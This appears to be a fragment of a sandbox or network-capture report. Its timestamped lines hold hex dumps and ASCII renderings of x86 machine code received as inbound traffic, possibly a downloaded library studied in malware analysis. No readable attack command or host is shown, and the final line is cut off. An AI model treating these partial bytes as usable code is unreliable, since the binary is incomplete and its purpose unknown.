2023-11-18 09:02:39 UTC	1045	IN	Data Raw: 85 c0 74 05 03 45 fc eb 02 33 c0 8b 4d 14 89 46 04 8b 45 18 50 51 56 ff 75 08 c7 01 00 00 00 00 c7 00 00 00 00 00 e8 11 00 00 00 83 c4 10 8b c7 5f 5e 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 57 8b 7d 0c 8b 0f 3b 4f 04 72 15 8b 45 10 5f c7 00 ff ff ff ff 8b 45 14 c7 00 ff ff ff ff 5d c3 53 56 8d 55 0c e8 d3 98 ff ff 01 07 8b 45 0c 8b 37 8b 5d 14 83 f8 01 75 2b 8d 55 0c 8b ce e8 ba 98 ff ff 8b 4d 10 8d 55 0c 03 c6 89 07 8b 45 0c 89 01 c7 03 00 00 00 00 8b 0f e8 9e 98 ff ff 01 07 8b 45 0c 83 c0 fe 01 03 5e 5b 5f 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 55 08 8b 4a 64 85 c9 74 0e 8b 52 60 39 11 74 0b 8b 49 0c 85 c9 75 f5 33 c0 5d c3 83 7d 0c 00 8b 41 04 74 f5 c7 41 04 00 00 00 00 c7 41 08 00 00 00 00 5d c3 cc cc cc cc cc cc cc cc 55 8b ec Data Ascii: tE3MFEPQVu_^]UW};OrE_E]SVUE7]u+UMUEE^[_]UUJdtR`9tIu3]}AtAA]U
2023-11-18 09:02:39 UTC	1050	IN	Data Raw: 8b 40 0c eb 0c 8b 46 34 8b 40 08 8b 48 10 8b 40 14 50 51 6a 01 ff 37 e8 eb cb 0b 00 8b 43 0c ff 40 40 ff 37 e8 ae dd 0b 00 8b 4b 0c 83 c4 14 ff 49 40 83 f8 64 75 0d 83 66 3c fd 33 c0 5f 5e 5b 8b e5 5d c3 ff 37 e8 5c ee 0b 00 8b f0 83 c4 04 85 f6 75 0c b8 0b 01 00 00 5f 5e 5b 8b e5 5d c3 8b 43 0c 83 78 68 00 74 20 ff 30 e8 97 ec 04 00 83 c4 04 50 68 10 8c 12 10 e8 39 75 0e 00 8b 4b 0c 83 c4 08 8b 49 68 89 01 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc 55 8b ec 8b 4d 08 8b 41 18 48 83 f8 03 77 4c ff 24 85 e4 7a 02 10 8b 45 0c c7 00 00 00 00 00 c7 40 04 00 00 00 00 33 c0 5d c3 8b 41 38 85 c0 74 12 8b 48 08 8b 50 0c 8b 45 0c 89 08 89 50 04 33 c0 5d c3 8b 41 34 8b 40 08 8b 48 10 8b 50 14 8b 45 0c 89 08 89 50 04 33 c0 5d c3 6a 00 ff 71 30 e8 eb d3 0b 00 8b 4d 0c Data Ascii: @F4@H@PQj7C@@7KI@duf<3_^[]7\u_^[]Cxht 0Ph9uKIh_^[]UMAHwL$zE@3]A8tHPEP3]A4@HPEP3]jq0M
2023-11-18 09:02:39 UTC	1054	IN	Data Raw: 18 02 8d 47 18 89 45 f8 74 23 8b 77 34 85 f6 74 1c 8b 4e 08 e8 e9 f8 00 00 ff 76 14 e8 a1 8f 0e 00 83 c4 04 56 e8 98 8f 0e 00 83 c4 04 8b 77 64 85 f6 74 70 8b 46 08 8b 5e 0c 85 c0 74 08 ff 76 04 ff d0 83 c4 04 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 56 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 56 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 56 ff 15 ec 22 14 10 83 c4 04 8b f3 85 db 75 90 ff 77 5c e8 46 de 0b 00 8b 77 58 83 c4 04 85 f6 74 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 56 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 56 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 18 50 ff 15 20 Data Ascii: GEt#w4tNvVwdtpF^tv="tEAtP#V")@BdBV"AtP #V"uw\FwXtX="tEAtP#V")@BdBV"AtP
2023-11-18 09:02:39 UTC	1057	IN	Data Raw: 89 44 24 30 0f 85 cd 00 00 00 8b ce e8 64 7b 00 00 85 c0 75 5f 50 6a 51 ff 74 24 2c ff 74 24 34 e8 30 bc fe ff 8b f8 8b da 33 c0 89 44 24 28 39 44 24 2c 7e 2f 8b 4c 24 30 8b f3 0f be 04 08 8b cf 0f a4 ce 03 99 c1 e1 03 03 f9 13 de 03 f8 8b 44 24 28 13 da 40 89 44 24 28 3b 44 24 2c 7c d5 8b 74 24 10 31 7c 24 1c 31 5c 24 14 8b 5c 24 14 8b 54 24 18 6a 00 6a 00 6a 00 8b ce e8 04 61 00 00 8b 54 24 24 83 c4 0c 8b ce e8 86 51 00 00 85 c0 0f 84 1e ff ff ff 8b 7c 24 1c 8b ca e8 03 65 00 00 8b 44 24 20 83 38 00 0f 85 bc 01 00 00 83 7c 24 44 00 0f 84 b1 01 00 00 39 7d 08 75 09 39 5d 0c 0f 84 a3 01 00 00 8b 5c 24 20 c7 03 0b 01 00 00 e9 98 01 00 00 33 c9 89 4c 24 58 8b 42 48 0f b7 40 04 8d 1c 40 c1 e3 05 03 da 8b 83 a8 00 00 00 83 c0 08 3b 44 24 5c 76 18 50 8d 54 24 Data Ascii: D$0d{u_PjQt$,t$403D$(9D$,~/L$0D$(@D$(;D$,\|t$1\|$1\$\$T$jjjaT$$Q\|$eD$ 8\|$D9}u9]\$ 3L$XBH@@;D$\vPT$
2023-11-18 09:02:39 UTC	1061	IN	Data Raw: 08 8b 40 0c 85 c0 74 0a 50 ff 15 20 23 14 10 83 c4 04 ff 75 e8 e8 f6 c1 0b 00 83 c4 04 8b 45 14 8b 5d dc 89 38 85 db 74 6a 83 3d c8 22 14 10 00 74 57 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 53 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 53 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 25 50 ff 15 20 23 14 10 8b 46 24 83 c4 04 c7 46 24 00 00 00 00 5f 5e 5b 8b e5 5d c3 53 ff 15 ec 22 14 10 83 c4 04 8b 46 24 5f c7 46 24 00 00 00 00 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 53 56 57 ff 75 10 8b 39 8b c2 ff 75 0c 89 4c 24 18 6a 30 ff 75 08 89 44 24 24 ff 71 1c ff 71 18 8b 49 0c e8 9f 93 00 00 33 db 83 c4 18 8b f0 39 5f 18 7e 50 0f 1f 00 85 f6 75 47 8b 47 1c 8b 4d 0c 8b 55 10 ff 34 Data Ascii: @tP #uE]8tj="tWAtP#S")@BdBS"At%P #F$F$_^[]S"F$_F$^[]USVWu9uL$j0uD$$qqI39_~PuGGMU4
2023-11-18 09:02:39 UTC	1065	IN	Data Raw: 1c 8b 44 24 28 8b f8 8b 54 24 24 85 c0 0f 85 48 ff ff ff eb 04 8b 4c 24 1c 85 db 0f 84 c0 fe ff ff 83 7b 30 00 0f 84 b6 fe ff ff 8d 04 89 8b 4c 24 18 8d 54 24 44 8d 04 41 8b 4c 24 20 50 e8 48 f7 00 00 83 c4 04 85 c0 0f 85 9d fe ff ff ff 73 24 8d 73 20 89 44 24 4c 8b 43 30 8d 54 24 3c ff 36 8d 4c 24 4c 89 44 24 18 e8 cd f2 00 00 8b 53 14 8d 43 28 8b 4b 2c 56 50 e8 cd f3 00 00 83 c4 10 8d 4c 24 10 8b d3 e8 5f 03 00 00 8b 74 24 10 83 7e 30 00 8d 46 30 89 44 24 1c 0f 84 96 00 00 00 8b 4e 20 8d 5e 20 8b 43 04 89 74 24 28 3b 4c 24 38 75 06 3b 44 24 3c 74 12 50 51 8d 54 24 40 8d 4c 24 4c e8 72 f2 00 00 83 c4 08 8b 56 14 8d 46 28 8b 4e 2c 53 50 e8 6f f3 00 00 8b 74 24 24 83 c4 08 8b 13 8b 5b 04 8b 36 89 74 24 10 85 db 7c 34 7f 04 85 d2 72 2e 8d 4c 24 10 85 f6 74 Data Ascii: D$(T$$HL${0L$T$DAL$ PHs$s D$LC0T$<6L$LD$SC(K,VPL$_t$~0F0D$N ^ Ct$(;L$8u;D$<tPQT$@L$LrVF(N,SPot$$[6t$\|4r.L$t
2023-11-18 09:02:39 UTC	1069	IN	Data Raw: 24 28 8b f0 8b 44 24 74 d1 fe 03 74 24 38 89 74 24 38 8d 0c 07 03 ce 3b ca 7f 21 8b 44 24 10 03 44 24 20 56 50 8d 04 3b 50 e8 18 8d fe ff 83 c4 0c 03 fe 89 7c 24 68 e9 88 00 00 00 8b 4c 24 14 33 db 39 59 24 75 7d eb 04 8b 44 24 74 2b d7 2b f3 2b d0 3b f2 7e 12 8b 4c 24 10 03 4c 24 20 8d 0c 0b e8 bf 01 00 00 8b f0 8b 44 24 10 03 44 24 20 03 c3 56 50 8b 44 24 6c 03 c7 50 e8 c5 8c fe ff 8b 84 24 80 00 00 00 03 fe 8b 54 24 34 03 c7 83 c4 0c 89 7c 24 68 03 de 3b c2 7c 15 8b 4c 24 14 8d 54 24 58 e8 1c 14 00 00 8b 7c 24 68 8b 54 24 28 8b 74 24 38 3b de 7d 0a 8b 44 24 14 83 78 24 00 74 85 8b 4c 24 10 03 ce 89 4c 24 10 8b 54 24 2c 8b 74 24 74 8b 5c 24 14 83 c3 24 83 3b 00 0f 84 40 fd ff ff 83 3b 00 8b 74 24 24 8b 7c 24 14 75 24 8b 46 10 8b 40 04 89 46 10 eb 04 8b Data Ascii: $(D$tt$8t$8;!D$D$ VP;P\|$hL$39Y$u}D$t+++;~L$L$ D$D$ VPD$lP$T$4\|$h;\|L$T$X\|$hT$(t$8;}D$x$tL$L$T$,t$t\$$;@;t$$\|$u$F@F
2023-11-18 09:02:39 UTC	1073	IN	Data Raw: 00 8b 48 1c 8b 50 10 8b 06 8b 78 4c 8d 04 0a 03 45 0c 3b c7 7c 7d 2b fa 33 f6 2b f9 85 ff 7e 16 90 8d 0c 1e 8d 54 24 18 e8 14 28 ff ff 0f b6 c0 03 f0 3b f7 7c eb 8b 7c 24 0c 85 f6 74 32 8b 47 10 03 c6 3b 47 14 76 14 8b 4c 24 10 8d 57 0c 50 e8 2c d6 00 00 83 c4 04 85 c0 75 14 8b 47 0c 03 47 10 56 53 50 e8 57 7c fe ff 83 c4 0c 01 77 10 29 75 0c 03 de 8b 74 24 14 8b d7 8b ce e8 bf 03 00 00 83 7e 24 00 8d 4e 24 8b c7 0f 84 70 ff ff ff eb 04 8b 4c 24 10 8b 44 24 0c 8b 7d 0c 85 ff 7e 2f 8d 70 0c 8b 46 04 03 c7 3b 46 08 76 0f 50 8b d6 e8 ca d5 00 00 83 c4 04 85 c0 75 13 8b 06 03 46 04 57 53 50 e8 f6 7b fe ff 83 c4 0c 01 7e 04 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b f9 8b f2 83 7f 24 00 8d 47 24 89 45 fc 0f 85 c9 00 00 00 8b Data Ascii: HPxLE;\|}+3+~T$(;\|\|$t2G;GvL$WP,uGGVSPW\|w)ut$~$N$pL$D$}~/pF;FvPuFWSP{~_^[]USVW$G$E
2023-11-18 09:02:39 UTC	1077	IN	Data Raw: 74 13 89 4f 34 8b 4d fc 83 4e 04 02 e8 4b 2a 00 00 33 db eb 10 8b 4d fc e8 2f 2e 00 00 33 db eb 04 c6 47 10 01 f6 46 04 02 74 09 c7 46 20 b0 11 03 10 eb 19 8b 45 fc b9 20 0d 03 10 ba 00 10 03 10 8b 00 83 78 30 01 0f 44 ca 89 4e 20 8b 45 0c 89 38 53 e8 74 30 0e 00 83 c4 04 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 18 53 8b d9 89 55 f0 33 c0 33 c9 56 8b 75 18 57 89 4d f8 89 45 fc 39 43 24 75 21 85 f6 79 0b 39 43 0c 0f 95 c1 03 4a 10 eb 0f 8b 4d 1c 8d 04 76 8b 44 82 1c 3b c1 0f 4c c8 89 4d f8 8b d1 8b cb e8 a6 0c 00 00 8b f8 8b 45 20 89 7d f4 89 38 85 ff 0f 84 59 02 00 00 8b 55 08 8b c2 c1 e8 04 8b ca 24 01 d1 e9 83 e1 01 88 47 38 8b 45 0c 89 4f 34 89 47 28 f6 c2 20 75 0d 8b d7 8d 4b 24 e8 38 02 00 00 8b 55 08 83 7b 24 00 0f 85 10 02 Data Ascii: tO4MNK*3M/.3GFtF E x0DN E8St0_^[]USU33VuWME9C$u!y9CJMvD;LME }8YU$G8EO4G( uK$8U{$
2023-11-18 09:02:39 UTC	1082	IN	Data Raw: c7 83 f0 01 8d 04 40 c1 e0 05 83 c0 50 03 c1 83 79 34 00 89 45 f8 74 09 33 c0 ba 00 00 00 80 eb 08 83 c8 ff ba ff ff ff 7f 89 41 40 8b 41 30 89 51 44 03 c7 99 2b c2 8b d8 8b 41 48 d1 fb 80 7c 98 02 00 8d 04 98 89 45 f4 74 5f 8b 45 f8 8b 7e 50 8b 76 54 8b 50 50 8b 40 54 3b fa 75 08 3b f0 0f 84 8b 00 00 00 3b c6 7c 0d 7f 04 3b d7 76 07 be 01 00 00 00 eb 02 33 f6 8b 79 34 3b f7 75 08 8b 75 f8 89 75 fc eb 1c 3b 41 44 7c 0e 7f 05 3b 51 40 76 07 be 01 00 00 00 eb 02 33 f6 3b f7 8b 75 fc 75 06 89 41 44 89 51 40 8b d6 b8 ab aa aa 2a 2b d1 83 ea 50 f7 ea c1 fa 04 8b c2 c1 e8 1f 03 c2 8b 55 f4 66 89 02 83 fb 01 74 30 8b 51 48 8b f3 83 f6 01 8b c3 0f b7 14 b2 8d 71 50 8d 14 52 c1 e2 05 03 f2 89 75 f8 8b 75 fc e9 43 ff ff ff 5f 5e b8 01 00 00 00 5b 8b e5 5d c3 8b 45 Data Ascii: @Py4Et3A@A0QD+AH\|Et_E~PvTPP@T;u;;\|;v3y4;uuu;AD\|;Q@v3;uuADQ@*+PUft0QHqPRuuC_^[]E
2023-11-18 09:02:39 UTC	1086	IN	Data Raw: 09 8b 47 0c 8b 40 04 40 eb 13 8d 0c 03 8d 55 08 e8 1d f8 fe ff 03 d8 8b 45 08 03 45 dc 8b 4d f8 8b d7 89 47 30 89 5f 2c e8 95 0c 00 00 8b 4d f8 8b d7 e8 0b 0d 00 00 5f 5e 5b 8b e5 5d c3 8b 45 f8 c7 40 24 0b 01 00 00 5f 5e 5b 8b e5 5d c3 cc cc cc 55 8b ec 51 53 56 8b f2 8b d9 57 8b 06 8b 56 04 8b 7e 24 83 e2 02 8b 00 89 45 fc 3b 7e 08 75 0e 8b 4e 0c 8b 46 30 3b 41 08 7c 12 8b 45 fc 57 50 8b cb e8 a9 0e 00 00 83 c4 08 89 46 40 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 1c 53 56 57 8b fa 8b f1 33 c0 89 7d e4 89 75 fc 89 45 f4 8b 4f 40 85 c9 74 5e 8b 07 33 f6 8b 59 18 89 5d f4 8b 00 99 8b c8 8b c3 c1 e1 05 99 03 f0 13 ca 51 56 8b 75 fc 8b ce e8 2c 29 00 00 83 c4 08 89 45 f8 85 c0 0f 84 27 01 00 00 8b 48 04 83 f9 04 7c 09 39 48 08 Data Ascii: G@@UEEMG0_,M_^[]E@$_^[]UQSVWV~$E;~uNF0;A\|EWPF@_^[]USVW3}uEO@t^3Y]QVu,)E'H\|9H
2023-11-18 09:02:39 UTC	1089	IN	Data Raw: 43 0c 89 4b 28 89 4b 18 8b 40 04 3b f0 7c 15 8b 4d f8 40 8b d3 89 43 30 e8 48 00 00 00 5f 5e 5b 8b e5 5d c3 8b 4d ec 8d 55 e8 8d 0c 0e e8 a3 eb fe ff 8b 4d f8 03 c6 89 43 2c 8b d3 8b 45 e8 01 43 30 e8 1e 00 00 00 5f 5e 5b 8b e5 5d c3 8b 45 f8 5f 5e 5b c7 40 24 0b 01 00 00 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 8b f2 57 8b f9 8b 46 0c 8b 5e 18 8b 08 8b 40 08 89 4d f8 8b 4e 1c 99 3b ca 7c 34 7f 04 3b d8 72 2e 8b d6 8b cf e8 5e 01 00 00 8b 46 0c 85 c0 75 13 39 47 24 75 37 c7 47 24 0b 01 00 00 5f 5e 5b 8b e5 5d c3 8b 00 bb 04 00 00 00 33 ff eb 05 8b 45 f8 8b f9 8d 56 50 8d 0c 03 e8 89 e9 fe ff 0f b6 c0 99 03 c3 89 46 18 13 d7 89 56 1c 5f 5e 5b 8b e5 5d c3 cc cc cc cc 55 8b ec 51 83 79 24 00 57 8b fa 0f 85 a9 00 00 00 8b 01 56 8b 77 18 8b d6 83 Data Ascii: CK(K@;\|M@C0H_^[]MUMC,EC0_^[]E_^[@$]USVWF^@MN;\|4;r.^Fu9G$u7G$_^[]3EVPFV_^[]UQy$WVw
2023-11-18 09:02:39 UTC	1093	IN	Data Raw: b8 01 00 00 00 88 0a eb 34 85 f6 77 24 72 08 81 f9 ff 3f 00 00 77 1a 8b c1 0f ac f0 07 0c 80 c1 ee 07 80 e1 7f 88 02 88 4a 01 b8 02 00 00 00 eb 0c 56 51 8b ca e8 86 d8 fe ff 83 c4 08 03 d8 89 5c 24 30 8b 54 24 18 8b 44 24 0c 42 8b 4c 24 14 83 c1 0c 89 54 24 18 89 4c 24 14 3b 10 0f 8c 1d fd ff ff 8b 4c 24 1c 83 c0 0c 8b 54 24 28 41 89 4c 24 1c 89 44 24 0c 3b 4a 14 0f 8c c0 fb ff ff 8b 4c 24 10 53 8b 5c 24 30 8b d3 6a 00 6a 0a e8 ac 0a 00 00 83 c4 0c 85 db 74 60 83 3d c8 22 14 10 00 74 4d a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 53 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 53 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 1b 50 ff 15 20 23 14 10 83 c4 04 5f 5e 5b 8b e5 5d c3 53 ff 15 ec 22 14 10 83 c4 04 5f 5e 5b 8b Data Ascii: 4w$r?wJVQ\$0T$D$BL$T$L$;L$T$(AL$D$;JL$S\$0jjt`="tMAtP#S")@BdBS"AtP #_^[]S"_^[
2023-11-18 09:02:39 UTC	1097	IN	Data Raw: f8 83 ec 0c 53 8b 5d 0c b8 0d 00 00 00 56 57 89 4c 24 10 8d 73 ff 85 f6 78 1b 8b 7d 08 0f b6 14 3e 8d 0c c5 00 00 00 00 33 d1 33 c2 83 ee 01 79 ec 8b 4c 24 10 33 d2 f7 71 0c 8b 41 14 8b 3c 90 85 ff 74 65 0f 1f 80 00 00 00 00 8b 47 14 40 3b d8 75 50 8b 45 08 8d 57 28 8b f3 83 ee 04 72 11 8b 0a 3b 08 75 10 83 c2 04 83 c0 04 83 ee 04 73 ef 83 fe fc 74 4e 8a 0a 3a 08 75 27 83 fe fd 74 43 8a 4a 01 3a 48 01 75 1a 83 fe fe 74 36 8a 4a 02 3a 48 02 75 0d 83 fe ff 74 29 8a 4a 03 3a 48 03 74 21 8b 3f 85 ff 75 a2 8b 45 10 c7 00 00 00 00 00 8b 45 14 c7 00 00 00 00 00 33 c0 5f 5e 5b 8b e5 5d c3 8b 47 10 8d 4b 29 2b c1 89 4c 24 0c 89 44 24 14 83 c0 16 99 8b f0 8b da e8 4a 59 04 00 85 c0 74 1e 8b 45 10 c7 00 00 00 00 00 8b 45 14 c7 00 00 00 00 00 b8 07 00 00 00 5f 5e 5b Data Ascii: S]VWL$sx}>33yL$3qA<teG@;uPEW(r;ustN:u'tCJ:Hut6J:Hut)J:Ht!?uEE3_^[]GK)+L$D$JYtEE_^[
2023-11-18 09:02:39 UTC	1101	IN	Data Raw: 00 00 0f 1f 40 00 8b 77 04 8b c6 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 3b c3 74 06 7d 4f 38 0f 74 4b 8b 55 10 83 e8 04 72 11 8b 0e 3b 0a 75 10 83 c6 04 83 c2 04 83 e8 04 73 ef 83 f8 fc 74 36 8a 0e 3a 0a 75 27 83 f8 fd 74 2b 8a 4e 01 3a 4a 01 75 1a 83 f8 fe 74 1e 8a 4e 02 3a 4a 02 75 0d 83 f8 ff 74 11 8a 46 03 3a 42 03 74 09 8b 7f 0c 85 ff 75 93 eb 53 8b 74 24 1c 8b 5d 08 c7 44 24 1c 00 00 00 00 8b 46 08 8b 7b 08 83 c0 0f 8b 5b 0c 3b 46 0c 76 1e 50 8d 56 04 8d 4c 24 20 e8 64 66 00 00 83 c4 04 85 c0 74 0a 8b 44 24 1c 85 c0 75 3e eb 11 8b 54 24 24 8d 4e 04 53 57 e8 f5 61 00 00 83 c4 08 8b 5c 24 20 8b 55 08 8b 7c 24 10 8b 44 24 14 83 44 24 18 10 40 89 44 24 14 3b 47 10 7d 0b 8b 74 24 18 8b c8 e9 e9 fe ff ff 33 c0 5f 5e 5b 8b e5 5d c3 56 57 8b 39 33 f6 85 ff 7e Data Ascii: @wP@u+;t}O8tKUr;ust6:u't+N:JutN:JutF:BtuSt$]D$F{[;FvPVL$ dftD$u>T$$NSWa\$ U\|$D$D$@D$;G}t$3_^[]VW93~
2023-11-18 09:02:39 UTC	1314	IN	Data Raw: cc cc cc cc cc 89 51 14 c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 56 8b f1 57 85 f6 0f 84 d6 00 00 00 33 ff 39 7e 08 7e 13 8d 5e 0c 8b 0b e8 72 03 00 00 47 8d 5b 04 3b 7e 08 7c f0 8b 7e 04 85 ff 74 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 57 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 18 50 ff 15 20 23 14 10 eb 07 57 ff 15 ec 22 14 10 83 c4 04 a1 e8 41 14 10 83 3d c8 22 14 10 00 74 45 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 56 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 56 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 18 50 ff 15 20 23 14 10 83 c4 04 5f 5e 5b c3 56 ff 15 ec 22 14 10 83 c4 04 5f 5e 5b c3 cc cc cc Data Ascii: QSVW39~~^rG[;~\|~tX="tEAtP#W")@BdBW"AtP #W"A="tEtP#V")@BdBV"AtP #_^[V"_^[
2023-11-18 09:02:39 UTC	1330	IN	Data Raw: 0f 1f 44 00 00 8a 06 46 84 c0 75 f9 2b f1 33 c0 8b fe 83 c7 01 13 c0 89 44 24 0c e8 95 f6 03 00 85 c0 75 18 8b 4c 24 0c 8b c7 0b c1 74 0e 51 57 e8 40 80 0d 00 83 c4 08 8b f8 eb 02 33 ff 8b 45 0c 89 18 8b 45 08 89 18 85 ff 75 1c 8b 44 24 10 57 c7 00 07 00 00 00 e8 89 7e 0d 00 83 c4 04 8b c3 5f 5e 5b 8b e5 5d c3 8d 46 01 8b 74 24 14 50 56 57 e8 de b9 fd ff 8a 07 83 c4 0c 3c 22 74 23 3c 27 74 1f 3c 5b 74 1b 3c 60 74 17 8b ce e8 e2 07 00 00 8b d8 85 db 74 21 8b cf 2b ce c6 04 19 00 eb 13 8b cf e8 0b 06 00 00 8d 1c 06 8b 45 0c c7 00 01 00 00 00 85 db 75 12 57 e8 25 7e 0d 00 83 c4 04 8b c3 5f 5e 5b 8b e5 5d c3 8b 45 08 89 38 8b c3 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 51 6a 00 52 6a 00 33 d2 e8 83 bf fe ff 83 c4 0c 59 c3 cc cc cc cc cc cc cc cc Data Ascii: DFu+3D$uL$tQW@3EEuD$W~_^[]Ft$PVW<"t#<'t<[t<`tt!+EuW%~_^[]E8_^[]QjRj3Y
2023-11-18 09:02:39 UTC	1346	IN	Data Raw: 08 ff 76 04 8b 40 1c ff d0 8b d8 83 c4 04 89 5d 08 85 db 74 75 8b 5f 08 85 db 74 55 83 3d c8 22 14 10 00 74 42 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 53 ff 15 f4 22 14 10 29 05 40 42 14 10 ff 0d 64 42 14 10 53 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 08 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 53 ff 15 ec 22 14 10 83 c4 04 8b 47 0c ff 70 08 68 10 8c 12 10 e8 d4 13 0d 00 8b 5d 08 83 c4 08 89 47 08 8b 4e 0c 85 c9 74 06 8b 46 08 89 41 08 8b 4e 08 8b 46 0c 56 89 01 e8 40 3e 0d 00 83 c4 04 8b c3 5f 5e 5b 5d c3 cc cc cc cc cc cc 55 8b ec 83 e4 f8 51 53 8b 5d 0c 56 57 8b 7d 08 8b 47 10 c7 03 00 00 00 00 89 44 24 0c 83 78 14 00 74 0c b8 01 00 00 00 5f 5e 5b 8b e5 5d c3 e8 cc b5 03 00 85 c0 0f 85 90 00 00 00 50 6a 10 e8 7c 3f 0d 00 8b f0 83 c4 08 85 Data Ascii: v@]tu_tU="tBAtP#S")@BdBS"AtP #S"Gph]GNtFANFV@>_^[]UQS]VW}GD$xt_^[]Pj\|?
2023-11-18 09:02:39 UTC	1348	IN	Data Raw: c0 75 f9 5f 2b ce 8b c3 5e 89 0a 5b 5d c2 2c 00 33 c9 89 0a 5f 5e 8b c3 5b 5d c2 2c 00 cc cc cc cc cc cc cc cc 55 8b ec 8b 55 0c 8b 4d 08 56 6a 04 6a 01 e8 cd 67 0a 00 8b 75 10 83 c4 08 8b d0 85 f6 74 32 85 d2 74 28 8b ca 57 8d 79 02 0f 1f 80 00 00 00 00 66 8b 01 83 c1 02 66 85 c0 75 f5 2b cf 8b c2 d1 f9 03 c9 5f 89 0e 5e 5d c2 0c 00 33 c9 8b c2 89 0e 5e 5d c2 0c 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 55 0c 8b 4d 08 56 6a 04 6a 00 e8 6d 67 0a 00 8b 75 10 83 c4 08 8b d0 85 f6 74 2a 85 d2 74 20 8b ca 57 8d 79 01 0f 1f 80 00 00 00 00 8a 01 41 84 c0 75 f9 2b cf 8b c2 5f 89 0e 5e 5d c2 0c 00 33 c9 8b c2 89 0e 5e 5d c2 0c 00 cc cc 55 8b ec 8b 55 0c 8b 4d 08 56 6a 03 6a 01 e8 1d 67 0a 00 8b 75 10 83 c4 08 8b d0 85 f6 74 32 85 d2 74 28 8b ca 57 8d 79 02 0f Data Ascii: u_+^[],3_^[],UUMVjjgut2t(Wyffu+_^]3^]UUMVjjmgut*t WyAu+_^]3^]UUMVjjgut2t(Wy
2023-11-18 09:02:39 UTC	1380	IN	Data Raw: 38 8b 08 56 57 0f b7 41 08 83 e0 3f 80 b8 38 bc 13 10 05 0f 84 b8 00 00 00 0f b7 41 08 a8 08 74 06 f2 0f 10 01 eb 1e a8 24 74 0c 8b 51 04 8b 09 e8 80 2f 0d 00 eb 0e a8 12 74 07 e8 35 bd 0a 00 eb 03 0f 57 c0 f2 0f 11 44 24 38 e8 82 2f fc ff c7 00 00 00 00 00 e8 77 2f fc ff 83 38 00 75 34 dd 44 24 38 e8 35 19 fc ff f2 0f 10 05 f0 cc 13 10 83 ec 08 dd 5c 24 40 f2 0f 5e 44 24 40 f2 0f 11 04 24 ff 75 08 e8 ca 3d 0a 00 83 c4 0c 5f 5e 8b e5 5d c3 e8 39 2f fc ff 8b 38 e8 32 2f fc ff ff 30 e8 f8 46 fc ff 8b 4d 08 83 c4 04 8b f0 8b c7 99 6a ff 6a 01 52 c7 41 14 01 00 00 00 8b d6 8b 09 50 e8 6d b2 0a 00 83 c4 10 5f 5e 8b e5 5d c3 8b 45 08 b9 00 24 00 00 8b 00 66 85 48 08 74 0d 8b c8 e8 0d be 0a 00 5f 5e 8b e5 5d c3 b9 01 00 00 00 5f 66 89 48 08 5e 8b e5 5d c3 cc cc Data Ascii: 8VWA?8At$tQ/t5WD$8/w/8u4D$85\$@^D$@$u=_^]9/82/0FMjjRAPm_^]E$fHt_^]_fH^]
2023-11-18 09:02:39 UTC	1396	IN	Data Raw: dd 01 00 00 8b 41 04 3b 42 04 0f 85 d1 01 00 00 68 50 0f 13 10 ff d7 68 02 08 00 00 8d 84 24 ac 01 00 00 6a 00 50 e8 6a c4 fb ff 83 c4 0c 8d 84 24 a8 01 00 00 68 00 04 00 00 50 68 74 0f 13 10 ff 15 68 80 11 10 8b 4c 24 28 85 c0 8b 01 0f 84 40 01 00 00 8d 94 24 88 00 00 00 c7 84 24 88 00 00 00 00 00 00 00 8b 40 24 52 51 ff d0 8b f0 85 f6 79 0c 68 a0 0f 13 10 ff d7 e9 8e 01 00 00 68 02 08 00 00 8d 84 24 b4 09 00 00 6a 00 50 e8 02 c4 fb ff 83 c4 0c ff 15 88 80 11 10 50 ff b4 24 8c 00 00 00 ff 15 10 81 11 10 50 8d 84 24 bc 09 00 00 68 c0 0f 13 10 50 ff 15 18 82 11 10 83 c4 14 8d 84 24 a8 01 00 00 68 02 08 00 00 6a 00 50 e8 c0 c3 fb ff 83 c4 0c 8d 84 24 a8 01 00 00 68 00 04 